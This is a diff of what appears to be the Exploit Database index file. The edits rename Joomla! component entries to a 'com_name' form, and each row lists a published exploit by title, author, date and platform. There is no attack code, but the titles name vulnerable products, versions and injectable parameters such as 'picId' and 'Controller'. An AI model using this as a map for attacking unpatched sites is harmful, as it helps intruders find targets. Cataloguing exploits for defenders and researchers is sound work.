-35958,platforms/php/webapps/35958.txt,"Joomla! Component Juicy Gallery - 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
-35959,platforms/php/webapps/35959.txt,"Joomla! Component com_hospital - SQL Injection",2011-07-15,SOLVER,php,webapps,0
-35960,platforms/php/webapps/35960.txt,"Joomla! Component Controller - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
+35958,platforms/php/webapps/35958.txt,"Joomla! Component 'com_juicy' - 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
+35959,platforms/php/webapps/35959.txt,"Joomla! Component 'com_hospital' - SQL Injection",2011-07-15,SOLVER,php,webapps,0
+35960,platforms/php/webapps/35960.txt,"Joomla! Component 'com_controller' - 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
 35961,platforms/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",hp-ux,remote,0
 35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0
 35987,platforms/php/webapps/35987.txt,"Support Incident Tracker (SiT!) 3.63 p1 - search.php search_string Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0
 35964,platforms/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Privilege Escalation",2015-02-01,"Parvez Anwar",windows,local,0
-35965,platforms/php/webapps/35965.txt,"Joomla! Component com_resman - Cross-Site Scripting",2011-07-15,SOLVER,php,webapps,0
-35966,platforms/php/webapps/35966.txt,"Joomla! Component com_newssearch - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
+35966,platforms/php/webapps/35966.txt,"Joomla! Component 'com_newssearch' - SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
 35967,platforms/php/webapps/35967.txt,"AJ Classifieds - 'listingid' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
 35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps,0
 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0
@@ -32549,10 +32548,10 @@ id,file,description,date,author,platform,type,port
 36009,platforms/php/webapps/36009.txt,"mt LinkDatenbank - 'b' Parameter Cross-Site Scripting",2011-08-03,Err0R,php,webapps,0
 36010,platforms/asp/webapps/36010.txt,"BESNI OKUL PORTAL - 'sayfa.asp' Cross-Site Scripting",2011-08-03,Err0R,asp,webapps,0
 36011,platforms/asp/webapps/36011.txt,"Ataccan E-Ticaret Scripti - 'id' Parameter SQL Injection",2011-08-03,Err0R,asp,webapps,0
-36012,platforms/php/webapps/36012.txt,"Joomla! Component Slideshow Gallery - 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
+36012,platforms/php/webapps/36012.txt,"Joomla! Component 'com_xeslidegalfx' - 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
 36013,platforms/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,multiple,remote,0
 36014,platforms/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure",2015-02-07,"Todor Donev",hardware,remote,0
-36015,platforms/php/webapps/36015.txt,"Joomla! Component com_community - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
+36015,platforms/php/webapps/36015.txt,"Joomla! Component 'com_community' - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0
 36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 - 'zxpdf' Security Bypass",2011-08-04,"Chung-chieh Shan",multiple,remote,0
 36017,platforms/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0
 36018,platforms/php/webapps/36018.txt,"WordPress Plugin WP E-Commerce 3.8.6 - 'cart_messages[]' Parameter Cross-Site Scripting",2011-08-04,"High-Tech Bridge SA",php,webapps,0
@@ -32697,7 +32696,7 @@ id,file,description,date,author,platform,type,port
 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0
 36168,platforms/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0
 36170,platforms/php/webapps/36170.txt,"PunBB 1.3.6 - 'browse.php' Cross-Site Scripting",2011-09-26,Amir,php,webapps,0
-36171,platforms/php/webapps/36171.txt,"Joomla! Component com_biitatemplateshop - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
+36171,platforms/php/webapps/36171.txt,"Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
 36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0
 36173,platforms/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0
 36174,platforms/windows/remote/36174.txt,"ServersCheck Monitoring Software 8.8.x - Multiple Remote Security Vulnerabilities",2011-09-27,Vulnerability-Lab,windows,remote,0
@@ -32743,19 +32742,19 @@ id,file,description,date,author,platform,type,port
 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0
 36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0
 36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,"cr4wl3r ",php,webapps,0
-36215,platforms/php/webapps/36215.txt,"Joomla! Component com_expedition - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
+36215,platforms/php/webapps/36215.txt,"Joomla! Component 'com_expedition' - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
 36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0
 36217,platforms/windows/remote/36217.txt,"GoAhead WebServer 2.18 - addgroup.asp group Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0
 36218,platforms/windows/remote/36218.txt,"GoAhead WebServer 2.18 - addlimit.asp url Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0
 36219,platforms/windows/remote/36219.txt,"GoAhead WebServer 2.18 - adduser.asp Multiple Parameter Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0
-36220,platforms/php/webapps/36220.txt,"Joomla! Component com_tree - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
-36221,platforms/php/webapps/36221.txt,"Joomla! Component com_br - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
-36222,platforms/php/webapps/36222.txt,"Joomla! Component com_shop - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
+36220,platforms/php/webapps/36220.txt,"Joomla! Component 'com_tree' - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
+36221,platforms/php/webapps/36221.txt,"Joomla! Component 'com_br' - 'state_id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
+36222,platforms/php/webapps/36222.txt,"Joomla! Component 'com_shop' - 'id' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
 36223,platforms/php/webapps/36223.txt,"2Moons 1.4 - Multiple Remote File Inclusion",2011-10-11,indoushka,php,webapps,0
 36224,platforms/php/webapps/36224.txt,"6KBBS 8.0 build 20101201 - Cross-Site Scripting / Information Disclosure",2011-10-10,"labs insight",php,webapps,0
 36225,platforms/php/webapps/36225.txt,"ContaoCMS 2.10.1 - Cross-Site Scripting",2011-10-02,"Stefan Schurtz",php,webapps,0
 36226,platforms/php/webapps/36226.txt,"Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0
-36227,platforms/php/webapps/36227.txt,"Joomla! Component Sgicatalog 1.0 - 'id' Parameter SQL Injection",2011-10-12,"BHG Security Center",php,webapps,0
+36227,platforms/php/webapps/36227.txt,"Joomla! Component 'com_sgicatalog' 1.0 - 'id' Parameter SQL Injection",2011-10-12,"BHG Security Center",php,webapps,0
 36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0
 36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0
 36230,platforms/php/webapps/36230.txt,"WordPress Plugin Calculated Fields Form 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",php,webapps,0
@@ -32820,11 +32819,11 @@ id,file,description,date,author,platform,type,port
 36295,platforms/php/webapps/36295.txt,"PBCS Technology - 'articlenav.php' SQL Injection",2011-11-08,Kalashinkov3,php,webapps,0
 36296,platforms/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Privilege Escalation",2011-11-09,IKCE,bsd,local,0
 36297,platforms/php/webapps/36297.txt,"AShop - Open-redirection / Cross-Site Scripting",2011-11-09,"Infoserve Security Team",php,webapps,0
-36298,platforms/php/webapps/36298.txt,"Joomla! Extension com_alfcontact 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0
+36298,platforms/php/webapps/36298.txt,"Joomla! Component 'com_alfcontact' 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0
 36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0
 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0
 36301,platforms/php/webapps/36301.txt,"WordPress Plugin Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0
-36302,platforms/php/webapps/36302.txt,"Joomla! Component Content - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0
+36302,platforms/php/webapps/36302.txt,"Joomla! Component 'com_content' - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0
 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80
 36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution (Metasploit)",2015-03-06,Metasploit,windows,remote,5555
 36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0
@@ -32989,10 +32988,10 @@ id,file,description,date,author,platform,type,port
 36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0
 36466,platforms/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0
 36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0
-36469,platforms/php/webapps/36469.txt,"Joomla! Component com_tsonymf - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
+36469,platforms/php/webapps/36469.txt,"Joomla! Component 'com_tsonymf' - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
 36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0
 36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 - Multiple Cross-Site Scripting / SQL Injection",2011-12-20,"High-Tech Bridge SA",php,webapps,0
-36472,platforms/php/webapps/36472.txt,"Joomla! Component com_caproductprices - 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
+36472,platforms/php/webapps/36472.txt,"Joomla! Component 'com_caproductprices' - 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
 36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' Parameter SQL Injection",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0
 36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0
 36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection",2011-12-21,Vulnerability-Lab,hardware,remote,0
@@ -33062,7 +33061,7 @@ id,file,description,date,author,platform,type,port
 36546,platforms/windows/remote/36546.txt,"GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double-Free Remote Memory Corruption",2012-01-12,NCNIPC,windows,remote,0
 36547,platforms/asp/webapps/36547.txt,"MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site Scripting",2012-01-12,"Sajjad Pourali",asp,webapps,0
 36548,platforms/java/webapps/36548.txt,"Contus Job Portal - 'Category' Parameter SQL Injection",2012-01-13,Lazmania61,java,webapps,0
-36549,platforms/php/webapps/36549.txt,"Joomla! Component HD Video Share 1.3 - 'id' Parameter SQL Injection",2012-01-12,Lazmania61,php,webapps,0
+36549,platforms/php/webapps/36549.txt,"Joomla! Component 'com_contushdvideoshare' 1.3 - 'id' Parameter SQL Injection",2012-01-12,Lazmania61,php,webapps,0
 36550,platforms/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 - 'index.php' Cross-Site Scripting",2012-01-16,Atmon3r,php,webapps,0
 36551,platforms/php/webapps/36551.txt,"PHP Ringtone Website - 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps,0
 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 - Multiple 'index.php' Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
@@ -33098,16 +33097,16 @@ id,file,description,date,author,platform,type,port
 36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0
 36587,platforms/windows/remote/36587.py,"Savant Web Server 3.1 - Remote Buffer Overflow (4)",2012-01-21,red-dragon,windows,remote,0
 36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0
-36589,platforms/php/webapps/36589.txt,"Joomla! Component com_br - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0
+36589,platforms/php/webapps/36589.txt,"Joomla! Component 'com_br' - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0
 36590,platforms/php/webapps/36590.txt,"Tribiq CMS - 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps,0
-36591,platforms/php/webapps/36591.txt,"Joomla! Component Full 'com_full' - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0
-36592,platforms/php/webapps/36592.txt,"Joomla! Component com_sanpham - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
-36593,platforms/php/webapps/36593.txt,"Joomla! Component com_xball - 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0
-36594,platforms/php/webapps/36594.txt,"Joomla! Component com_boss - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
-36595,platforms/php/webapps/36595.txt,"Joomla! Component com_car - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
-36596,platforms/php/webapps/36596.txt,"Joomla! Component com_some - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
-36597,platforms/php/webapps/36597.txt,"Joomla! Component com_bulkenquery - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
-36598,platforms/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36591,platforms/php/webapps/36591.txt,"Joomla! Component 'com_full' - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36592,platforms/php/webapps/36592.txt,"Joomla! Component 'com_sanpham' - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36593,platforms/php/webapps/36593.txt,"Joomla! Component 'com_xball' - 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0
+36594,platforms/php/webapps/36594.txt,"Joomla! Component 'com_boss' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36595,platforms/php/webapps/36595.txt,"Joomla! Component 'com_car' - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36596,platforms/php/webapps/36596.txt,"Joomla! Component 'com_some' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36597,platforms/php/webapps/36597.txt,"Joomla! Component 'com_bulkenquery' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
+36598,platforms/php/webapps/36598.txt,"Joomla! Component 'com_kp' - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0
 36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0
 36600,platforms/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80
 36601,platforms/php/webapps/36601.txt,"Joomla! Component 'com_rand' - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80
@@ -33131,28 +33130,28 @@ id,file,description,date,author,platform,type,port
 36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0
 36622,platforms/windows/dos/36622.pl,"UltraPlayer 2.112 Malformed - '.avi' File Denial of Service",2012-01-24,KedAns-Dz,windows,dos,0
 36623,platforms/php/webapps/36623.txt,"Ultimate Locator - 'radius' Parameter SQL Injection",2012-01-24,"Robert Cooper",php,webapps,0
-36624,platforms/php/webapps/36624.txt,"Joomla! Component com_jesubmit - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0
+36624,platforms/php/webapps/36624.txt,"Joomla! Component 'com_jesubmit' - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps,0
 36625,platforms/php/webapps/36625.txt,"OSClass 2.3.3 - 'index.php' sCategory Parameter SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps,0
 36626,platforms/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php' getParam() Function Multiple Parameter Cross-Site Scripting",2012-01-25,"High-Tech Bridge SA",php,webapps,0
 36627,platforms/php/webapps/36627.txt,"DClassifieds 0.1 final - Cross-Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps,0
 36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0
-36629,platforms/php/webapps/36629.txt,"Joomla! Component com_motor - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0
-36630,platforms/php/webapps/36630.txt,"Joomla! Component com_products - Multiple SQL Injections",2012-01-26,the_cyber_nuxbie,php,webapps,0
+36629,platforms/php/webapps/36629.txt,"Joomla! Component 'com_motor' - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0
+36630,platforms/php/webapps/36630.txt,"Joomla! Component 'com_products' - Multiple SQL Injections",2012-01-26,the_cyber_nuxbie,php,webapps,0
 36631,platforms/php/webapps/36631.txt,"WordPress Plugin Slideshow Gallery 1.1.x - 'border' Parameter Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0
 36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting",2012-01-26,sonyy,php,webapps,0
 36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow / Denial of Service",2012-01-10,"Laurent Butti",linux,dos,0
-36634,platforms/php/webapps/36634.txt,"Joomla! Component com_visa - Local File Inclusion / SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
-36635,platforms/php/webapps/36635.txt,"Joomla! Component com_firmy - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
+36634,platforms/php/webapps/36634.txt,"Joomla! Component 'com_visa' - Local File Inclusion / SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
+36635,platforms/php/webapps/36635.txt,"Joomla! Component 'com_firmy' - 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
 36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0
-36638,platforms/php/webapps/36638.txt,"Joomla! Component com_crhotels - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0
-36639,platforms/php/webapps/36639.txt,"Joomla! Component com_propertylab - 'id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
+36638,platforms/php/webapps/36638.txt,"Joomla! Component 'com_crhotels' - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0
+36639,platforms/php/webapps/36639.txt,"Joomla! Component 'com_propertylab' - 'id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0
 36640,platforms/php/webapps/36640.txt,"WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0
 36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0
-36642,platforms/php/webapps/36642.txt,"Joomla! Component com_bbs - Multiple SQL Injections",2012-01-30,the_cyber_nuxbie,php,webapps,0
+36642,platforms/php/webapps/36642.txt,"Joomla! Component 'com_bbs' - Multiple SQL Injections",2012-01-30,the_cyber_nuxbie,php,webapps,0
 36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0
 36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter Cross-Site Scripting",2012-01-31,RandomStorm,php,webapps,0
 36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0
-36646,platforms/php/webapps/36646.txt,"Joomla! Component com_cmotour - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
+36646,platforms/php/webapps/36646.txt,"Joomla! Component 'com_cmotour' - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0
 36647,platforms/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,php,webapps,0
 36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
 36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
@@ -33163,9 +33162,9 @@ id,file,description,date,author,platform,type,port
 36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
 36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0
 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0
-36657,platforms/php/webapps/36657.txt,"Joomla! Component com_bnf - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0
+36657,platforms/php/webapps/36657.txt,"Joomla! Component 'com_bnf' - 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0
 36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module - Cross-Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0
-36659,platforms/php/webapps/36659.txt,"Joomla! Component Currency Converter - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0
+36659,platforms/php/webapps/36659.txt,"Joomla! Component 'mod_currencyconverter' - 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0
 36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0
 36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0
 36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 - ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0
@@ -33330,8 +33329,8 @@ id,file,description,date,author,platform,type,port
 36831,platforms/hardware/remote/36831.txt,"Endian Firewall 2.4 - openvpn_users.cgi PATH_INFO Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
 36832,platforms/hardware/remote/36832.txt,"Endian Firewall 2.4 - dnat.cgi createrule Parameter Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
 36833,platforms/hardware/remote/36833.txt,"Endian Firewall 2.4 - dansguardian.cgi addrule Parameter Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
-36834,platforms/php/webapps/36834.txt,"Joomla! Component X-Shop - 'idd' Parameter SQL Injection",2012-02-18,KedAns-Dz,php,webapps,0
-36835,platforms/php/webapps/36835.txt,"Joomla! Component Xcomp 'com_xcomp' - Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0
+36834,platforms/php/webapps/36834.txt,"Joomla! Component 'com_x-shop' - 'idd' Parameter SQL Injection",2012-02-18,KedAns-Dz,php,webapps,0
+36835,platforms/php/webapps/36835.txt,"Joomla! Component 'com_xcomp' - Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0
 36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution (PoC)",2015-04-27,"Jay Turla",multiple,remote,0
 36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
 36844,platforms/php/webapps/36844.txt,"WordPress 4.2 - Persistent Cross-Site Scripting",2015-04-27,klikki,php,webapps,0
@@ -33347,14 +33346,14 @@ id,file,description,date,author,platform,type,port
 36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x - viewFriends.php Multiple Parameter Cross-Site Scripting",2012-02-21,"Aung Khant",php,webapps,0
 36854,platforms/php/webapps/36854.txt,"Dolphin 7.0.x - explanation.php explain Parameter Cross-Site Scripting",2012-02-21,"Aung Khant",php,webapps,0
 36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition",2015-04-29,"Ben Sheppard",linux,local,0
-36856,platforms/php/webapps/36856.txt,"Joomla! Component com_xvs - 'Controller' Parameter Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0
+36856,platforms/php/webapps/36856.txt,"Joomla! Component 'com_xvs' - 'Controller' Parameter Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0
 36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0
 36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
 36859,platforms/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
 36860,platforms/php/webapps/36860.txt,"WordPress Plugin TheCartPress 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80
 36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466
 36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
